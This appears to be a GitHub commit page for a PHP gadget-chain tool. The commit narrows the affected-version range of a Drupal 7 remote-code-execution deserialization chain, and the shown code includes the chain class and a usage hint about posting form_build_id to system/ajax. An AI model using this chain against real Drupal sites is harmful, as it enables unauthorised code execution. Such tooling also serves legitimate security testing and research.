Skip to content

Commit

Permalink
Fixed version for Drupal7/RCE1
Browse files Browse the repository at this point in the history
  • Loading branch information
mcdruid committed Dec 6, 2023
1 parent b8bf80c commit aab3b9a
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions gadgetchains/Drupal7/RCE/1/chain.php
Original file line number Diff line number Diff line change
Expand Up @@ -4,7 +4,7 @@

class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
{
public static $version = '7.0.8 < ?';
public static $version = '7.0.8 <= 7.98';
public static $vector = '__destruct';
public static $author = 'Blaklis';
public static $information = 'You will need to post form_build_id=DrupalRCE to /?q=system/ajax once the payload is unserialized';
Expand All @@ -16,4 +16,4 @@ public function generate(array $parameters)

return new \SchemaCache($function,$parameter);
}
}
}

0 comments on commit aab3b9a

Please sign in to comment.